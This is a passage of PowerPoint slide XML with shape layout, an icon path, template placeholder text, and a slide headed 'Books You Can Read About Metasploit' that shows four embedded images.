        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9167688" y="3782726"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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25" name="Rectangle 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A83EAC5E-14BC-A9DB-8BC1-D9C9904F3CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9167688" y="3347084"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Rectangle 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B2BB5FC-0385-E6C3-C315-9CEF4F427137}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902919" y="3782726"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This is a sample text. Insert your desired text here. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Rectangle 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ABA0EE3-C53A-2DEC-0E5C-2D2669E47376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902919" y="3347084"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Placeholder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Graphic 24" descr="Users outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C36B2B3E-7555-E38D-BE67-11928A8492FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5563578" y="3464400"/>
            <a:ext cx="1064847" cy="646503"/>
            <a:chOff x="5694438" y="3533089"/>
            <a:chExt cx="800035" cy="485727"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Freeform: Shape 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{709F2173-C42F-6CCE-DBAB-F613D35D202F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="57800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2A5FE23F-27D6-AFCB-04FE-D615EB4F6F01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="62372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FAD1E6F-216D-BE00-0B66-444D44967BF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6205387" y="3725351"/>
              <a:ext cx="289085" cy="161925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 269072 w 289085"/>
                <a:gd name="connsiteY0" fmla="*/ 50473 h 161925"/>
                <a:gd name="connsiteX1" fmla="*/ 186709 w 289085"/>
                <a:gd name="connsiteY1" fmla="*/ 11125 h 161925"/>
                <a:gd name="connsiteX2" fmla="*/ 117624 w 289085"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 161925"/>
                <a:gd name="connsiteX3" fmla="*/ 48749 w 289085"/>
                <a:gd name="connsiteY3" fmla="*/ 11078 h 161925"/>
                <a:gd name="connsiteX4" fmla="*/ 3124 w 289085"/>
                <a:gd name="connsiteY4" fmla="*/ 28461 h 161925"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 289085"/>
                <a:gd name="connsiteY5" fmla="*/ 51702 h 161925"/>
                <a:gd name="connsiteX6" fmla="*/ 54083 w 289085"/>
                <a:gd name="connsiteY6" fmla="*/ 29356 h 161925"/>
                <a:gd name="connsiteX7" fmla="*/ 117624 w 289085"/>
                <a:gd name="connsiteY7" fmla="*/ 19050 h 161925"/>
                <a:gd name="connsiteX8" fmla="*/ 181861 w 289085"/>
                <a:gd name="connsiteY8" fmla="*/ 29528 h 161925"/>
                <a:gd name="connsiteX9" fmla="*/ 257223 w 289085"/>
                <a:gd name="connsiteY9" fmla="*/ 65389 h 161925"/>
                <a:gd name="connsiteX10" fmla="*/ 258042 w 289085"/>
                <a:gd name="connsiteY10" fmla="*/ 65999 h 161925"/>
                <a:gd name="connsiteX11" fmla="*/ 270024 w 289085"/>
                <a:gd name="connsiteY11" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX12" fmla="*/ 270024 w 289085"/>
                <a:gd name="connsiteY12" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX13" fmla="*/ 289074 w 289085"/>
                <a:gd name="connsiteY13" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX14" fmla="*/ 289074 w 289085"/>
                <a:gd name="connsiteY14" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX15" fmla="*/ 269072 w 289085"/>
                <a:gd name="connsiteY15" fmla="*/ 5047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085" h="161925">
                  <a:moveTo>
                    <a:pt x="269072" y="50473"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="244794" y="31541"/>
                    <a:pt x="216691" y="18115"/>
                    <a:pt x="186709" y="11125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164264" y="4422"/>
                    <a:pt x="141039" y="682"/>
                    <a:pt x="117624" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94224" y="24"/>
                    <a:pt x="70976" y="3763"/>
                    <a:pt x="48749" y="11078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32945" y="15169"/>
                    <a:pt x="17644" y="20999"/>
                    <a:pt x="3124" y="28461"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2891" y="36295"/>
                    <a:pt x="1844" y="44084"/>
                    <a:pt x="0" y="51702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16938" y="41851"/>
                    <a:pt x="35131" y="34335"/>
                    <a:pt x="54083" y="29356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74593" y="22617"/>
                    <a:pt x="96035" y="19140"/>
                    <a:pt x="117624" y="19050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139399" y="19752"/>
                    <a:pt x="160992" y="23273"/>
                    <a:pt x="181861" y="29528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209299" y="35836"/>
                    <a:pt x="235021" y="48077"/>
                    <a:pt x="257223" y="65389"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="258042" y="65999"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="265876" y="71647"/>
                    <a:pt x="270372" y="80836"/>
                    <a:pt x="270024" y="90488"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="270024" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289074" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289074" y="90488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="289422" y="74665"/>
                    <a:pt x="281936" y="59690"/>
                    <a:pt x="269072" y="50473"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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69C42222-DE21-333F-0FBA-D24D62F48AEC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5694438" y="3725351"/>
              <a:ext cx="288597" cy="161925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 288598 w 288597"/>
                <a:gd name="connsiteY0" fmla="*/ 50225 h 161925"/>
                <a:gd name="connsiteX1" fmla="*/ 285740 w 288597"/>
                <a:gd name="connsiteY1" fmla="*/ 27289 h 161925"/>
                <a:gd name="connsiteX2" fmla="*/ 240440 w 288597"/>
                <a:gd name="connsiteY2" fmla="*/ 11097 h 161925"/>
                <a:gd name="connsiteX3" fmla="*/ 171374 w 288597"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 161925"/>
                <a:gd name="connsiteX4" fmla="*/ 102499 w 288597"/>
                <a:gd name="connsiteY4" fmla="*/ 11078 h 161925"/>
                <a:gd name="connsiteX5" fmla="*/ 19564 w 288597"/>
                <a:gd name="connsiteY5" fmla="*/ 50787 h 161925"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 288597"/>
                <a:gd name="connsiteY6" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 288597"/>
                <a:gd name="connsiteY7" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX8" fmla="*/ 19050 w 288597"/>
                <a:gd name="connsiteY8" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX9" fmla="*/ 19050 w 288597"/>
                <a:gd name="connsiteY9" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX10" fmla="*/ 31128 w 288597"/>
                <a:gd name="connsiteY10" fmla="*/ 65932 h 161925"/>
                <a:gd name="connsiteX11" fmla="*/ 107871 w 288597"/>
                <a:gd name="connsiteY11" fmla="*/ 29356 h 161925"/>
                <a:gd name="connsiteX12" fmla="*/ 171374 w 288597"/>
                <a:gd name="connsiteY12" fmla="*/ 19050 h 161925"/>
                <a:gd name="connsiteX13" fmla="*/ 235610 w 288597"/>
                <a:gd name="connsiteY13" fmla="*/ 29528 h 161925"/>
                <a:gd name="connsiteX14" fmla="*/ 288598 w 288597"/>
                <a:gd name="connsiteY14" fmla="*/ 502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597" h="161925">
                  <a:moveTo>
                    <a:pt x="288598" y="50225"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="286864" y="42698"/>
                    <a:pt x="285906" y="35012"/>
                    <a:pt x="285740" y="27289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271205" y="20426"/>
                    <a:pt x="256032" y="15003"/>
                    <a:pt x="240440" y="11097"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218000" y="4405"/>
                    <a:pt x="194781" y="674"/>
                    <a:pt x="171374" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147974" y="24"/>
                    <a:pt x="124726" y="3763"/>
                    <a:pt x="102499" y="11078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72686" y="19206"/>
                    <a:pt x="44588" y="32659"/>
                    <a:pt x="19564" y="50787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7241" y="60272"/>
                    <a:pt x="15" y="74937"/>
                    <a:pt x="0" y="90488"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19050" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19050" y="90488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19068" y="80877"/>
                    <a:pt x="23526" y="71813"/>
                    <a:pt x="31128" y="65932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54306" y="49233"/>
                    <a:pt x="80301" y="36843"/>
                    <a:pt x="107871" y="29356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128369" y="22621"/>
                    <a:pt x="149798" y="19143"/>
                    <a:pt x="171374" y="19050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193149" y="19752"/>
                    <a:pt x="214741" y="23274"/>
                    <a:pt x="235610" y="29528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254108" y="34061"/>
                    <a:pt x="271924" y="41021"/>
                    <a:pt x="288598" y="50225"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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048E69A0-AAF0-83E4-41DB-A739EC2FC1A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5922962" y="3856892"/>
              <a:ext cx="342911" cy="161925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 322898 w 342911"/>
                <a:gd name="connsiteY0" fmla="*/ 50482 h 161925"/>
                <a:gd name="connsiteX1" fmla="*/ 240535 w 342911"/>
                <a:gd name="connsiteY1" fmla="*/ 11135 h 161925"/>
                <a:gd name="connsiteX2" fmla="*/ 171450 w 342911"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 161925"/>
                <a:gd name="connsiteX3" fmla="*/ 102594 w 342911"/>
                <a:gd name="connsiteY3" fmla="*/ 11078 h 161925"/>
                <a:gd name="connsiteX4" fmla="*/ 19660 w 342911"/>
                <a:gd name="connsiteY4" fmla="*/ 50787 h 161925"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 342911"/>
                <a:gd name="connsiteY5" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 342911"/>
                <a:gd name="connsiteY6" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX7" fmla="*/ 19050 w 342911"/>
                <a:gd name="connsiteY7" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX8" fmla="*/ 19050 w 342911"/>
                <a:gd name="connsiteY8" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX9" fmla="*/ 31137 w 342911"/>
                <a:gd name="connsiteY9" fmla="*/ 65932 h 161925"/>
                <a:gd name="connsiteX10" fmla="*/ 107871 w 342911"/>
                <a:gd name="connsiteY10" fmla="*/ 29356 h 161925"/>
                <a:gd name="connsiteX11" fmla="*/ 171450 w 342911"/>
                <a:gd name="connsiteY11" fmla="*/ 19050 h 161925"/>
                <a:gd name="connsiteX12" fmla="*/ 235696 w 342911"/>
                <a:gd name="connsiteY12" fmla="*/ 29527 h 161925"/>
                <a:gd name="connsiteX13" fmla="*/ 311048 w 342911"/>
                <a:gd name="connsiteY13" fmla="*/ 65380 h 161925"/>
                <a:gd name="connsiteX14" fmla="*/ 311868 w 342911"/>
                <a:gd name="connsiteY14" fmla="*/ 65989 h 161925"/>
                <a:gd name="connsiteX15" fmla="*/ 323850 w 342911"/>
                <a:gd name="connsiteY15" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX16" fmla="*/ 323850 w 342911"/>
                <a:gd name="connsiteY16" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX17" fmla="*/ 342900 w 342911"/>
                <a:gd name="connsiteY17" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX18" fmla="*/ 342900 w 342911"/>
                <a:gd name="connsiteY18" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX19" fmla="*/ 322898 w 342911"/>
                <a:gd name="connsiteY19" fmla="*/ 50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11" h="161925">
                  <a:moveTo>
                    <a:pt x="322898" y="50482"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="298622" y="31548"/>
                    <a:pt x="270518" y="18121"/>
                    <a:pt x="240535" y="11135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218089" y="4433"/>
                    <a:pt x="194864" y="691"/>
                    <a:pt x="171450" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148057" y="23"/>
                    <a:pt x="124815" y="3762"/>
                    <a:pt x="102594" y="11078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72779" y="19201"/>
                    <a:pt x="44681" y="32654"/>
                    <a:pt x="19660" y="50787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7297" y="60250"/>
                    <a:pt x="33" y="74919"/>
                    <a:pt x="0" y="90488"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19050" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19050" y="90488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19067" y="80874"/>
                    <a:pt x="23530" y="71809"/>
                    <a:pt x="31137" y="65932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54310" y="49229"/>
                    <a:pt x="80303" y="36839"/>
                    <a:pt x="107871" y="29356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128393" y="22613"/>
                    <a:pt x="149848" y="19136"/>
                    <a:pt x="171450" y="19050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193229" y="19748"/>
                    <a:pt x="214824" y="23270"/>
                    <a:pt x="235696" y="29527"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263132" y="35827"/>
                    <a:pt x="288853" y="48065"/>
                    <a:pt x="311048" y="65380"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="311868" y="65989"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="319704" y="71641"/>
                    <a:pt x="324199" y="80833"/>
                    <a:pt x="323850" y="90488"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="323850" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="90488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="343245" y="74668"/>
                    <a:pt x="335760" y="59698"/>
                    <a:pt x="322898" y="50482"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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061884D-5C32-4D1E-C4CE-DE3765ECF115}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6008687" y="366462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50 h 171450"/>
                <a:gd name="connsiteX6" fmla="*/ 152400 w 171450"/>
                <a:gd name="connsiteY6" fmla="*/ 85725 h 171450"/>
                <a:gd name="connsiteX7" fmla="*/ 85725 w 171450"/>
                <a:gd name="connsiteY7" fmla="*/ 152400 h 171450"/>
                <a:gd name="connsiteX8" fmla="*/ 19050 w 171450"/>
                <a:gd name="connsiteY8" fmla="*/ 85725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50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="122549" y="19050"/>
                    <a:pt x="152400" y="48901"/>
                    <a:pt x="152400" y="85725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152400" y="122549"/>
                    <a:pt x="122549" y="152400"/>
                    <a:pt x="85725" y="152400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48901" y="152400"/>
                    <a:pt x="19050" y="122549"/>
                    <a:pt x="19050" y="85725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19077" y="48904"/>
                    <a:pt x="48904" y="19055"/>
                    <a:pt x="85725" y="19002"/>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32762867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0017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F0AEE8-27D5-7A1C-77AE-D45E8D2DCA05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="43934"/>
            <a:ext cx="31694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i="1" u="sng" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Books You Can Read About Metasploit </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="1" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B61D5CF9-C688-34FA-36BA-85F02CBBF57D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="180303" y="1700011"/>
            <a:ext cx="2616445" cy="3457977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546BAABB-A551-F80A-9DC6-35E8C23D48C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3031002" y="1700011"/>
            <a:ext cx="2933664" cy="3457977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B14A2D4F-305C-E95E-5A33-0D1EE48C7E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6227336" y="1700011"/>
            <a:ext cx="2816001" cy="3457977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{088F53FD-634F-C88D-845F-96877345CE09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9306006" y="1728701"/>
            <a:ext cx="2794045" cy="3457977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B192831E-996D-70D7-26C7-F2123EC2ED4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-89786" y="4889537"/>
            <a:ext cx="1262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________________________________________________________________________________________________</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47D910B8-6783-45CB-38E7-7BC42005DE92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-40496" y="1368700"/>
            <a:ext cx="121110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_____________________________________________________________________________________________</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1512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C17992-1374-A689-EA72-E26611BFEEC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2782963" y="295713"/>
            <a:ext cx="9841353" cy="943532"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
